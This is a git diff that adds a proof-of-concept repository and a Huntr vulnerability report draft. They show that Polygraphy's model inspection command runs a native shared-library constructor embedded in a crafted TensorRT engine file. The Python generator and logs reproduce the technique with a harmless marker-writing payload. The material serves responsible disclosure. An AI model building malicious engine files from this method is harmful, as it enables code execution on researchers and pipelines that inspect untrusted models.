Add TensorRT Polygraphy serialized plugin ACE PoC

.gitattributes

@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+model.engine filter=lfs diff=lfs merge=lfs -text

README.md

@@ -0,0 +1,59 @@
+# TensorRT Polygraphy Serialized Plugin ACE PoC
+
+This repository contains a benign proof-of-concept TensorRT engine for a Huntr model-file vulnerability report.
+
+The key artifact is `model.engine`. It is a TensorRT version-compatible serialized engine that carries a serialized native shared library. The library constructor only writes a marker file when the environment variable `TRT_PLUGIN_MARKER` is set.
+
+Do not run this outside an isolated test environment.
+
+## Expected Behavior
+
+Running Polygraphy's normal inspection command against `model.engine` executes the embedded constructor before TensorRT rejects the intentionally incomplete plugin library:
+
+```bash
+cd "$RUN_DIR"
+python3 -m venv .venv
+. .venv/bin/activate
+python -m pip install --upgrade pip wheel setuptools
+python -m pip install polygraphy==0.49.26 tensorrt-cu12==10.16.1.11 tensorrt-lean-cu12==10.16.1.11
+
+export LD_LIBRARY_PATH="$RUN_DIR/.venv/lib/python3.12/site-packages/tensorrt_lean_libs:${LD_LIBRARY_PATH:-}"
+export TRT_PLUGIN_MARKER="$RUN_DIR/marker.txt"
+rm -f "$TRT_PLUGIN_MARKER"
+polygraphy inspect model "$RUN_DIR/model.engine"
+cat "$TRT_PLUGIN_MARKER"
+```
+
+Expected marker:
+
+```text
+marker_constructor pid=<pid> time=<timestamp>
+```
+
+Polygraphy may still exit with an inspection/deserialization error similar to:
+
+```text
+SymbolAddress for getCreators could not be loaded
+Could not deserialize engine. See log for details.
+```
+
+That failure happens after the constructor has already executed.
+
+## Why This Matters
+
+Polygraphy enables `runtime.engine_host_code_allowed = True` before deserializing engine bytes. TensorRT version-compatible engines can serialize plugin shared libraries. Together, this means a model inspection workflow can execute host code embedded in a model file.
+
+This PoC is specifically about Polygraphy's auto-trust behavior during `polygraphy inspect model model.engine`, not an application that explicitly opts into TensorRT host code execution itself.
+
+## Files
+
+- `model.engine` - crafted TensorRT engine PoC.
+- `trt_serialized_plugin_marker_probe.py` - reproducible generator/validator used to create the proof.
+- `evidence/` - local proof logs and negative-control outputs.
+
+## Engine Hash
+
+```text
+SHA256: 777cdecefc51699d43862522dd7ea92ec377f2dd9b25d40aa00b72edd74ad758
+Size:   111219596 bytes
+```

evidence/inferred_type_marker.txt

@@ -0,0 +1 @@
+marker_constructor pid=1356 time=1778690022

evidence/inferred_type_polygraphy.stderr

@@ -0,0 +1 @@
+[!] Could not deserialize engine. See log for details.

evidence/inferred_type_polygraphy.stdout

@@ -0,0 +1,5 @@
+[W] 'colored' module is not installed, will not use colors when logging. To enable colors, please install the 'colored' module: python3 -m pip install colored
+[I] Loading bytes from $RUN_DIR/isolated-run/model.engine
+[E] IRuntime::deserializeCudaEngine: Error Code 3: API Usage Error (SymbolAddress for getCreators could not be loaded, check function name against library symbol In untypedSymbolAddress at /_src/runtime/dispatch/libLoader.cpp:378)
+[E] [dispatchClasses.cpp::deserializeCudaEngine::1899] Error Code 2: Internal Error (Assertion engine != nullptr failed. Engine deserialization failed. In deserializeCudaEngine at /_src/runtime/dispatch/dispatchClasses.cpp:1899)
+[E] [runtime.cpp::deserializeCudaEngineEx::264] Error Code 2: Internal Error (Assertion iEngine failed.  In deserializeCudaEngineEx at /_src/runtime/dispatch/runtime.cpp:264)

evidence/isolated_marker.txt

@@ -0,0 +1 @@
+marker_constructor pid=1209 time=1778689895

evidence/negative_no_plugin_polygraphy.stdout

@@ -0,0 +1,21 @@
+[W] 'colored' module is not installed, will not use colors when logging. To enable colors, please install the 'colored' module: python3 -m pip install colored
+[I] Loading bytes from $RUN_DIR/cases/vc_embedded_lean_runtime.engine
+[W] hasImplicitBatchDimension is deprecated and always return false.
+[I] ==== TensorRT Engine ====
+    Name: Unnamed Network 0 | Explicit Batch Engine
+    
+    ---- 1 Engine Input(s) ----
+    {x [dtype=float32, shape=(1, 1)]}
+    
+    ---- 1 Engine Output(s) ----
+    {y [dtype=float32, shape=(1, 1)]}
+    
+    ---- Memory ----
+    Device Memory: 0 bytes
+    
+    ---- 1 Profile(s) (2 Tensor(s) Each) ----
+    - Profile: 0
+        Tensor: x          (Input), Index: 0 | Shapes: min=(1, 1), opt=(1, 1), max=(1, 1)
+        Tensor: y         (Output), Index: 1 | Shape: (1, 1)
+    
+    ---- 1 Layer(s) ----

evidence/trt_serialized_plugin_marker_probe.json

@@ -0,0 +1,62 @@
+{
+  "build": {
+    "path": "cases/vc_serialized_marker_plugin.engine",
+    "plugins_to_serialize": [
+      "plugin-work/libmarker_payload.so"
+    ],
+    "size": 111219596
+  },
+  "compile": {
+    "cmd": [
+      "g++",
+      "-shared",
+      "-fPIC",
+      "-O2",
+      "plugin-work/marker_payload.cpp",
+      "-o",
+      "plugin-work/libmarker_payload.so"
+    ],
+    "returncode": 0,
+    "stderr_tail": "",
+    "stdout_tail": ""
+  },
+  "deserialize_false": {
+    "allow_host_code": false,
+    "exception": null,
+    "marker_after": "",
+    "marker_changed": false,
+    "ok": false
+  },
+  "deserialize_true": {
+    "allow_host_code": true,
+    "exception": null,
+    "marker_after": "marker_constructor pid=1115 time=1778689845\n",
+    "marker_changed": true,
+    "ok": false
+  },
+  "plugin_lib": "plugin-work/libmarker_payload.so",
+  "plugin_removed_before_load": {
+    "moved_exists": true,
+    "moved_to": "plugin-work/libmarker_payload.removed",
+    "original_exists": false
+  },
+  "polygraphy_inspect": {
+    "cmd": [
+      "polygraphy",
+      "inspect",
+      "model",
+      "cases/vc_serialized_marker_plugin.engine",
+      "--model-type=engine",
+      "--show",
+      "attrs"
+    ],
+    "marker_after": "marker_constructor pid=1115 time=1778689845\nmarker_constructor pid=1185 time=1778689847\n",
+    "marker_changed": true,
+    "returncode": 1,
+    "stderr_tail": "[!] Could not deserialize engine. See log for details.\n",
+    "stdout_tail": "[W] 'colored' module is not installed, will not use colors when logging. To enable colors, please install the 'colored' module: python3 -m pip install colored\n[I] Loading bytes from $RUN_DIR/cases/vc_serialized_marker_plugin.engine\n[E] IRuntime::deserializeCudaEngine: Error Code 3: API Usage Error (SymbolAddress for getCreators could not be loaded, check function name against library symbol In untypedSymbolAddress at /_src/runtime/dispatch/libLoader.cpp:378)\n[E] [dispatchClasses.cpp::deserializeCudaEngine::1899] Error Code 2: Internal Error (Assertion engine != nullptr failed. Engine deserialization failed. In deserializeCudaEngine at /_src/runtime/dispatch/dispatchClasses.cpp:1899)\n[E] [runtime.cpp::deserializeCudaEngineEx::264] Error Code 2: Internal Error (Assertion iEngine failed.  In deserializeCudaEngineEx at /_src/runtime/dispatch/runtime.cpp:264)\n"
+  },
+  "python": "3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0]",
+  "source": "plugin-work/marker_payload.cpp",
+  "tensorrt_version": "10.16.1.11"
+}

huntr-submission-draft.md

@@ -0,0 +1,186 @@
+# Huntr Submission Draft: TensorRT Polygraphy Serialized Plugin ACE
+
+## Recommended Category
+
+Model File Vulnerability - Arbitrary Code Execution at model load/inspection time.
+
+Frame this as TensorRT `.engine` load-time ACE through a common model inspection tool. Do not frame it as a generic TensorRT library misuse or as a low-value scanner coverage gap.
+
+## Title
+
+Polygraphy auto-enables trusted TensorRT plan host code, executing serialized plugin constructors from a `.engine` file during inspection
+
+## Target
+
+TensorRT serialized engine (`.engine`, `.trt`, `.mytrtfile`) - NVIDIA
+
+## Severity
+
+Critical
+
+## Public PoC Model Repository
+
+https://huggingface.co/noshkas/tensorrt-polygraphy-serialized-plugin-ace-poc
+
+## Summary
+
+Polygraphy's TensorRT engine loader enables `runtime.engine_host_code_allowed = True` before deserializing arbitrary engine bytes. TensorRT version-compatible plans can serialize plugin shared libraries into the engine file. A crafted `.engine` file can therefore carry a native shared object whose constructor executes during a normal model inspection command:
+
+```bash
+cd "$RUN_DIR"
+polygraphy inspect model model.engine
+```
+
+In the PoC, the embedded native constructor writes a harmless marker file when `TRT_PLUGIN_MARKER` is set. The original plugin `.so` was removed from disk before inspection, and the isolated directory contained only `model.engine`, proving the code was loaded from the engine file. Polygraphy still fails to deserialize the intentionally incomplete plugin after the constructor runs, so the user sees a failed inspection even though host code already executed.
+
+This is specifically the Polygraphy auto-trust path during inspection. The victim does not explicitly call `IRuntime::setEngineHostCodeAllowed()` or provide a separate plugin library path.
+
+## Impact
+
+An attacker can publish a malicious TensorRT engine that embeds native host code. A researcher, CI job, model registry, or security gate that uses Polygraphy to inspect community TensorRT engines can execute attacker-controlled native code simply by inspecting the model file.
+
+Organizations using model inspection as a safety gate before loading community engines could pass a malicious file into Polygraphy and execute attacker-controlled code before any inspection result is returned.
+
+## Affected Versions Tested
+
+- Polygraphy: `0.49.26`
+- TensorRT Python package: `tensorrt-cu12==10.16.1.11`
+- TensorRT lean runtime package: `tensorrt-lean-cu12==10.16.1.11`
+- OS: Ubuntu 24.04
+- GPU: NVIDIA GeForce RTX 5090
+- Driver: 570.195.03
+- Python: 3.12.3
+
+## Root Cause
+
+Polygraphy reads the engine file bytes and then sets the TensorRT runtime trust flag before deserialization:
+
+```python
+runtime.engine_host_code_allowed = True
+```
+
+TensorRT documents `engine_host_code_allowed` as the flag required for trusted plans that may contain host code. TensorRT also documents `IBuilderConfig::setPluginsToSerialize` / `plugins_to_serialize`, which serializes plugin shared libraries into version-compatible engines. When such an engine is loaded with host code allowed, the serialized shared library is loaded and its constructor runs.
+
+Polygraphy's default inspection workflow therefore turns a model file inspection into a host-code execution sink.
+
+## Reproduction Steps
+
+Use an isolated CUDA/TensorRT host.
+
+```bash
+cd "$RUN_DIR"
+python3 -m venv .venv
+. .venv/bin/activate
+python -m pip install --upgrade pip wheel setuptools
+python -m pip install polygraphy==0.49.26 tensorrt-cu12==10.16.1.11 tensorrt-lean-cu12==10.16.1.11
+```
+
+Download the PoC model file from the public Hugging Face repository, then run:
+
+```bash
+cd "$RUN_DIR"
+export LD_LIBRARY_PATH="$RUN_DIR/.venv/lib/python3.12/site-packages/tensorrt_lean_libs:${LD_LIBRARY_PATH:-}"
+export TRT_PLUGIN_MARKER="$RUN_DIR/marker.txt"
+rm -f "$TRT_PLUGIN_MARKER"
+polygraphy inspect model "$RUN_DIR/model.engine"
+cat "$TRT_PLUGIN_MARKER"
+```
+
+Expected marker output:
+
+```text
+marker_constructor pid=<pid> time=<timestamp>
+```
+
+Expected Polygraphy output also includes a deserialization failure:
+
+```text
+SymbolAddress for getCreators could not be loaded
+Could not deserialize engine. See log for details.
+```
+
+The marker is written before that failure.
+
+## Reproduction From Generator Script
+
+The included `trt_serialized_plugin_marker_probe.py` generates the engine and runs negative controls:
+
+```bash
+cd "$RUN_DIR"
+python trt_serialized_plugin_marker_probe.py --out results/trt_serialized_plugin_marker_probe.json
+```
+
+The script:
+
+1. Builds a harmless native shared library with a constructor gated by `TRT_PLUGIN_MARKER`.
+2. Builds a version-compatible TensorRT engine with `config.plugins_to_serialize = ["libmarker_payload.so"]`.
+3. Removes the original `.so` before loading.
+4. Confirms `runtime.engine_host_code_allowed = False` does not execute the marker.
+5. Confirms `runtime.engine_host_code_allowed = True` executes the marker.
+6. Confirms `polygraphy inspect model model.engine` executes the marker.
+
+## Evidence
+
+PoC engine:
+
+```text
+SHA256: 777cdecefc51699d43862522dd7ea92ec377f2dd9b25d40aa00b72edd74ad758
+Size:   111219596 bytes
+```
+
+Primary result:
+
+```json
+{
+  "deserialize_false": {
+    "allow_host_code": false,
+    "marker_changed": false,
+    "ok": false
+  },
+  "deserialize_true": {
+    "allow_host_code": true,
+    "marker_changed": true,
+    "ok": false
+  },
+  "polygraphy_inspect": {
+    "returncode": 1,
+    "marker_changed": true
+  }
+}
+```
+
+Isolated proof:
+
+```text
+marker_constructor pid=1209 time=1778689895
+```
+
+Default command proof, without `--model-type=engine`:
+
+```text
+marker_constructor pid=1356 time=1778690022
+```
+
+Negative control:
+
+A version-compatible engine without a serialized plugin inspected successfully and did not create a marker.
+
+## Distinction From Nearby Pending Reports
+
+Huntr's public TensorRT listings show pending report titles involving `IRuntime::loadRuntime()` and `setEngineHostCodeAllowed()`. The body/details are not public, so I cannot verify whether they cover this exact path.
+
+This report is distinct because the trigger is Polygraphy's normal model-inspection command. The user does not explicitly opt into trusted host code. Polygraphy automatically sets the TensorRT trust flag and deserializes the model file, allowing a serialized plugin constructor embedded in the `.engine` to execute during inspection.
+
+## Official References
+
+- Huntr Participation Guidelines: https://huntr.com/guidelines
+- TensorRT `IBuilderConfig::setPluginsToSerialize`: https://docs.nvidia.com/deeplearning/tensorrt/latest/_static/c-api/classnvinfer1_1_1_i_builder_config.html
+- TensorRT Plugin API serialized plugin library loading: https://docs.nvidia.com/deeplearning/tensorrt/latest/inference-library/plugins-api-migration.html
+- TensorRT version-compatible plans and `engine_host_code_allowed`: https://docs.nvidia.com/deeplearning/tensorrt/10.13.3/inference-library/advanced.html
+- Polygraphy loader source: https://docs.nvidia.com/deeplearning/tensorrt/latest/_static/polygraphy/_modules/polygraphy/backend/trt/loader.html
+
+## Suggested Remediation
+
+Polygraphy should not silently enable `engine_host_code_allowed` for untrusted engine files. Require an explicit command-line opt-in such as `--allow-engine-host-code`, display a strong warning, and default to rejecting TensorRT plans that require host code during inspection.
+
+For safer inspection workflows, parse metadata without deserializing host-code-carrying plans where possible, or run deserialization in a sandboxed worker with no filesystem/network access.

model.engine

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:777cdecefc51699d43862522dd7ea92ec377f2dd9b25d40aa00b72edd74ad758
+size 111219596

trt_serialized_plugin_marker_probe.py

@@ -0,0 +1,212 @@
+#!/usr/bin/env python3
+import argparse
+import json
+import os
+import shutil
+import subprocess
+import sys
+import textwrap
+from pathlib import Path
+
+import tensorrt as trt
+
+
+C_SOURCE = r"""
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <unistd.h>
+
+__attribute__((constructor))
+static void marker_constructor(void) {
+    const char *path = getenv("TRT_PLUGIN_MARKER");
+    if (!path || !path[0]) {
+        return;
+    }
+    FILE *f = fopen(path, "a");
+    if (!f) {
+        return;
+    }
+    time_t now = time(NULL);
+    fprintf(f, "marker_constructor pid=%ld time=%ld\n", (long)getpid(), (long)now);
+    fclose(f);
+}
+
+extern "C" int trt_marker_export(void) {
+    return 1337;
+}
+"""
+
+
+def run(cmd, **kwargs):
+    proc = subprocess.run(cmd, text=True, capture_output=True, **kwargs)
+    return {
+        "cmd": cmd,
+        "returncode": proc.returncode,
+        "stdout_tail": proc.stdout[-4000:],
+        "stderr_tail": proc.stderr[-4000:],
+    }
+
+
+def compile_marker_lib(work: Path):
+    src = work / "marker_payload.cpp"
+    lib = work / "libmarker_payload.so"
+    src.write_text(C_SOURCE)
+    result = run(["g++", "-shared", "-fPIC", "-O2", str(src), "-o", str(lib)])
+    if result["returncode"] != 0:
+        raise RuntimeError(json.dumps(result, indent=2))
+    return src, lib, result
+
+
+def build_engine(path: Path, plugin_lib: Path):
+    logger = trt.Logger(trt.Logger.WARNING)
+    builder = trt.Builder(logger)
+    network = builder.create_network(
+        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
+    )
+    inp = network.add_input("x", trt.float32, (1, 1))
+    identity = network.add_identity(inp)
+    identity.get_output(0).name = "y"
+    network.mark_output(identity.get_output(0))
+
+    config = builder.create_builder_config()
+    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)
+    config.set_flag(trt.BuilderFlag.VERSION_COMPATIBLE)
+    config.plugins_to_serialize = [str(plugin_lib)]
+
+    serialized = builder.build_serialized_network(network, config)
+    if serialized is None:
+        raise RuntimeError("failed to build serialized plugin engine")
+    path.write_bytes(bytes(serialized))
+    return {
+        "path": str(path),
+        "size": path.stat().st_size,
+        "plugins_to_serialize": [str(plugin_lib)],
+    }
+
+
+def try_deserialize(path: Path, marker: Path, allow_host_code: bool):
+    logger = trt.Logger(trt.Logger.WARNING)
+    runtime = trt.Runtime(logger)
+    if hasattr(runtime, "engine_host_code_allowed"):
+        runtime.engine_host_code_allowed = allow_host_code
+
+    before = marker.read_text() if marker.exists() else ""
+    try:
+        engine = runtime.deserialize_cuda_engine(path.read_bytes())
+        ok = engine is not None
+        if engine is not None:
+            _ = engine.num_io_tensors
+        exc = None
+    except Exception as err:
+        ok = False
+        exc = f"{type(err).__name__}: {err}"
+    after = marker.read_text() if marker.exists() else ""
+    return {
+        "allow_host_code": allow_host_code,
+        "ok": ok,
+        "exception": exc,
+        "marker_changed": after != before,
+        "marker_after": after,
+    }
+
+
+def polygraphy_inspect(path: Path, marker: Path):
+    env = os.environ.copy()
+    env["TRT_PLUGIN_MARKER"] = str(marker)
+    before = marker.read_text() if marker.exists() else ""
+    proc = subprocess.run(
+        [
+            "polygraphy",
+            "inspect",
+            "model",
+            str(path),
+            "--model-type=engine",
+            "--show",
+            "attrs",
+        ],
+        text=True,
+        capture_output=True,
+        timeout=90,
+        env=env,
+    )
+    after = marker.read_text() if marker.exists() else ""
+    return {
+        "cmd": [
+            "polygraphy",
+            "inspect",
+            "model",
+            str(path),
+            "--model-type=engine",
+            "--show",
+            "attrs",
+        ],
+        "returncode": proc.returncode,
+        "stdout_tail": proc.stdout[-4000:],
+        "stderr_tail": proc.stderr[-4000:],
+        "marker_changed": after != before,
+        "marker_after": after,
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Test whether TensorRT serialized plugin libraries execute from an engine file."
+    )
+    parser.add_argument("--out", default="results/trt_serialized_plugin_marker_probe.json")
+    args = parser.parse_args()
+
+    out = Path(args.out)
+    base = out.parent.parent
+    work = base / "plugin-work"
+    cases = base / "cases"
+    out.parent.mkdir(parents=True, exist_ok=True)
+    work.mkdir(parents=True, exist_ok=True)
+    cases.mkdir(parents=True, exist_ok=True)
+
+    src, lib, compile_result = compile_marker_lib(work)
+    marker = out.parent / "serialized_plugin_marker.txt"
+    if marker.exists():
+        marker.unlink()
+
+    engine = cases / "vc_serialized_marker_plugin.engine"
+    result = {
+        "python": sys.version,
+        "tensorrt_version": trt.__version__,
+        "compile": compile_result,
+        "source": str(src),
+        "plugin_lib": str(lib),
+    }
+
+    try:
+        result["build"] = build_engine(engine, lib)
+    except Exception as err:
+        result["build_error"] = f"{type(err).__name__}: {err}"
+        out.write_text(json.dumps(result, indent=2, sort_keys=True))
+        print(json.dumps(result, indent=2, sort_keys=True))
+        return 2
+
+    removed_lib = work / "libmarker_payload.removed"
+    shutil.move(lib, removed_lib)
+    result["plugin_removed_before_load"] = {
+        "original_exists": lib.exists(),
+        "moved_to": str(removed_lib),
+        "moved_exists": removed_lib.exists(),
+    }
+
+    os.environ["TRT_PLUGIN_MARKER"] = str(marker)
+    result["deserialize_false"] = try_deserialize(
+        engine, marker, allow_host_code=False
+    )
+    result["deserialize_true"] = try_deserialize(
+        engine, marker, allow_host_code=True
+    )
+    result["polygraphy_inspect"] = polygraphy_inspect(engine, marker)
+
+    out.write_text(json.dumps(result, indent=2, sort_keys=True))
+    print(json.dumps(result, indent=2, sort_keys=True))
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())